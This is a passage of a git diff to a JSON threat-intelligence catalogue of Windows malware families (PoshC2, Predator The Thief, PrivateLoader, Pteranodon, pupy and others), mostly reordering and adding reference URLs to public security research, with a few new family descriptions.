"https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/" ], "synonyms": [], "type": [] @@ -38353,12 +40156,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb", - "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats", "https://securelist.com/apt-trends-report-q2-2018/86487/", + "https://asec.ahnlab.com/ko/18796/", "https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", - "https://asec.ahnlab.com/ko/18796/" + "https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" ], "synonyms": [], "type": [] @@ -38384,9 +40187,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor", "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf", "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba", - "https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf" + "https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector" ], "synonyms": [], "type": [] @@ -38425,21 +40228,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md", "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://paper.seebug.org/1301/", - "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://github.com/nettitude/PoshC2_Python/", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://paper.seebug.org/1301/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets", - "https://redcanary.com/blog/getsystem-offsec/" + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html", + "https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/", + "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md" ], "synonyms": [], "type": [] @@ -38452,9 +40255,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp", + "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", "https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf", "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", - "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", "https://twitter.com/just_windex/status/1162118585805758464" ], "synonyms": [ @@ -38471,9 +40274,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer", "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20", - "https://www.youtube.com/watch?v=MaPXDCq-Gf4", "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/", - "https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true" + "https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true", + "https://www.youtube.com/watch?v=MaPXDCq-Gf4" ], "synonyms": [ "Poullight" @@ -38484,12 +40287,12 @@ "value": "Poulight Stealer" }, { - "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.", + "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to \u201csecurely\u201d test the ransomware protection capabilities of security vendor products.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware", - "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html", - "https://youtu.be/oYLs6wuoOfg" + "https://youtu.be/oYLs6wuoOfg", + "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html" ], "synonyms": [], "type": [] @@ -38503,8 +40306,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks", "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/", - "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file", - "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" + "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users", + "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file" ], "synonyms": [], "type": [] @@ -38531,8 +40334,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://twitter.com/VK_Intel/status/1141540229951709184", - "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/" + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", + "https://twitter.com/VK_Intel/status/1141540229951709184" ], "synonyms": [], "type": [] @@ -38545,8 +40348,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", - "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/" + "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ], "synonyms": [], "type": [] @@ -38613,10 +40417,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", + "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf", "https://lokalhost.pl/gozi_tree.txt", "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/", - "https://content.fireeye.com/m-trends/rpt-m-trends-2017", - "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf" + "https://content.fireeye.com/m-trends/rpt-m-trends-2017" ], "synonyms": [ "PUNCHBUGGY" @@ -38631,13 +40435,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://content.fireeye.com/apt/rpt-apt38", "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/", + "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/" + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [ "QUICKRIDE.POWER" @@ -38666,16 +40470,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", "https://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html", - "https://securelist.com/a-predatory-tale/89779", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", - "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/", - "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/", + "https://securelist.com/a-predatory-tale/89779", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/", + "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html" ], "synonyms": [], "type": [] @@ -38684,12 +40488,12 @@ "value": "Predator The Thief" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Prestige is ransomware - malware that prevents victims from accessing (opening) their files by encrypting them. Additionally, Prestige appends the \".enc\" extension to filenames and drops the \"README\" file containing a ransom note. An example of how this ransomware modifies filenames: it renames \"1.jpg\" to \"1.jpg.enc\", \"2.png\" to \"2.png.enc\", and so forth.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige", - "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/", - "https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + "https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/", + "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/" ], "synonyms": [], "type": [] @@ -38702,6 +40506,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", + "https://securelist.com/cloudwizard-apt/109722/", "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" ], "synonyms": [], @@ -38730,8 +40535,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", - "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", - "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" + "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/", + "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/" ], "synonyms": [], "type": [] @@ -38744,20 +40549,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader", + "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/", + "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", + "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", + "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign", + "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html", + "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.youtube.com/watch?v=Ldp7eESQotM", "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e", "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", - "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/", - "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html", "https://www.zscaler.com/blogs/security-research/peeking-privateloader", - "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", - "https://www.youtube.com/watch?v=Ldp7eESQotM", - "https://intel471.com/blog/privateloader-malware", - "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign", - "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1" + "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1", + "https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/", + "https://intel471.com/blog/privateloader-malware" ], "synonyms": [], "type": [] @@ -38770,10 +40576,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog", - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", "https://twitter.com/ESETresearch/status/1433819369784610828", - "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive" + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" ], "synonyms": [], "type": [] @@ -38799,10 +40605,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei", - "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://twitter.com/honeymoon_ioc/status/1494016518694309896", - "https://blog.talosintelligence.com/prometei-botnet-improves/", "https://twitter.com/honeymoon_ioc/status/1494311182550904840", + "https://blog.talosintelligence.com/prometei-botnet-improves/", + "https://twitter.com/honeymoon_ioc/status/1494016518694309896", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities" ], "synonyms": [], @@ -38816,16 +40622,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus", + "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", "https://unit42.paloaltonetworks.com/prometheus-ransomware/", "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd", - "https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/", - "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", "https://twitter.com/inversecos/status/1441252744258461699?s=20", + "https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/", + "https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/", "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/", "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd", - "https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/", - "https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html", - "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea" + "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea", + "https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html" ], "synonyms": [], "type": [] @@ -38864,8 +40670,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot", - "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/" + "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/", + "https://www.youtube.com/watch?v=FttiysUZmDw" ], "synonyms": [], "type": [] @@ -38889,14 +40695,15 @@ "value": "Prynt Stealer" }, { - "description": "", + "description": "According to PCrisk, PseudoManuscrypt is the name of the malware that spies on victims. It is similar to another malware called Manuscrypt. We have discovered PseudoManuscrypt while checking installers for pirated software (one of the examples is a fake pirated installer for SolarWinds - a network monitoring software).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://www.youtube.com/watch?v=uakw2HMGZ-I", "https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/", - "https://asec.ahnlab.com/en/31683/", "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://asec.ahnlab.com/en/31683/", "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1" ], "synonyms": [], @@ -38910,13 +40717,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", - "https://twitter.com/seckle_ch/status/1169558035649433600", - "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", - "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://twitter.com/mesa_matt/status/1035211747957923840", + "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure", + "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module", + "https://twitter.com/seckle_ch/status/1169558035649433600", "https://blog.comodo.com/comodo-news/versions-of-psixbot/", - "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module" + "https://twitter.com/mesa_matt/status/1035211747957923840", + "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/" ], "synonyms": [ "PsiXBot" @@ -38931,9 +40738,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a", + "https://twitter.com/KevinPerlow/status/1160766519615381504", "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/", - "https://twitter.com/KevinPerlow/status/1160766519615381504" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a" ], "synonyms": [ "ECCENTRICBANDWAGON" @@ -38963,31 +40770,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine", "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/", - "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", - "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/", - "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", - "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/", - "https://cert.gov.ua/news/42", - "https://blogs.cisco.com/security/network-footprints-of-gamaredon-group", - "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", - "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/", - "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt", - "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", - "https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government", - "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/", - "https://www.elastic.co/blog/playing-defense-against-gamaredon-group", - "https://attack.mitre.org/groups/G0047", - "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", - "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/", - "https://blog.threatstop.com/russian-apt-gamaredon-group", - "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021", - "https://cert.gov.ua/news/46", - "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/", "https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military", + "https://www.elastic.co/blog/playing-defense-against-gamaredon-group", + "https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", + "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/", + "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021", + "https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf", + "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", + "https://blogs.cisco.com/security/network-footprints-of-gamaredon-group", + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game", + "https://attack.mitre.org/groups/G0047", + "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/", + "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/", + "https://blog.threatstop.com/russian-apt-gamaredon-group", + "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://cert.gov.ua/news/46", + "https://cert.gov.ua/news/42", + "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt" ], "synonyms": [ "Pterodo" @@ -39034,22 +40843,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", - "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://www.infinitumit.com.tr/apt-35/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://github.com/n1nj4sec/pupy", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", - "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt", "https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt" + "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html", + "https://www.infinitumit.com.tr/apt-35/", + "https://github.com/n1nj4sec/pupy", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf" ], "synonyms": [ "Patpoopy" @@ -39060,12 +40869,12 @@ "value": "pupy (Windows)" }, { - "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format ", + "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google\u2019s Protocol Buffer message format ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter", - "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf" + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter" ], "synonyms": [], "type": [] @@ -39078,9 +40887,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker", - "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/", + "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e", "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md", - 